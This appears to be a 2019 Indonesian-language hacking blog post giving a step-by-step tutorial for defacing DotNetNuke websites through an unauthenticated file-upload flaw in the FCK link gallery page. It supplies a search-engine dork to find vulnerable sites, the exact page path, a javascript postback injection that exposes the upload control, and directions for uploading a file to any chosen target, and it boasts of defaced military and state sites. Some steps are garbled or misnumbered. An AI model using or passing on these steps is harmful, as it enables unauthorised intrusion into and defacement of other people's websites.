Posted by : NisaStar7
Wednesday 2 January 2019
Hai cowok cowok cool and buriq,bertemu lagi dengan nisa yg paling imut,cans and paling normal di BCS :v kali ini nisa mau kasih Tuorial DNN hacking, oke langsung aja ya
Peretasan portal,ditemukan bug oleh peneliti iran.DNN galeri semua versi upload file jarak jauh tanpa otentikasi,Bug ini di temukan oleh Alireza Afzali tim ISCN pada tanggal 2008/05/5.
Lebih dari 10 situs web milliter dan 20 negara bagian United States Of American Defaced oleh lidah bug ini.
- Temukan jalur DNN lalu buka file ini
kode : /providers/HtmlEditorProviders/fck/fcklinkgallery.aspx
- pilih file (A File di situs anda)
- setelah membuat kemudian letakan kode ini sebagai gantinya URL
kode : javascript:_doPostBack (ctlURL $ cmdUpload;")
- sekarang kmu melihat people,pilih foolder root dan kmu akan di unggah ke file situs/jalur dnn/prtal/0
berikut adalah cara meretas situs dari portal
langkah pertama
mskan dork : inurl:/tabid/36/language/en-US/default.aspx
kode: portal/0/ (ini adalah dork untuk menemukan situs portal vuln)
langkah kedua
-U akan menemukan banyak situs,plih situs yg nyaman bagi kmu.
langkah ketiga
sekarang ganti kode : /home/tabid/36/language/en-US/Default.aspx dengan kode : /providers/HtmlEditorProviders/fck/fcklinkgallery.aspx
langkah keempat
anda akan mendapatkan halaman link gallery
langkah kelima
jangan lakukan apapun untuk saat ini,PENDEKATAN PENDEK FINAL
langkah keenam
sekarang gantu URL dibilah alamat dgn sikap sederhana
kode : javascript:_doPostBack ('ctlURL $ cmdUpload',")
langkah ketujuh
anda akan menemukan opsi browser dan upload
langkah kesembilan
upload paket anda
langkah terakhir
pergi ke http://www.sitetarget,com/portal/0/paket anda
sekian dari nisa semoga bermanfaat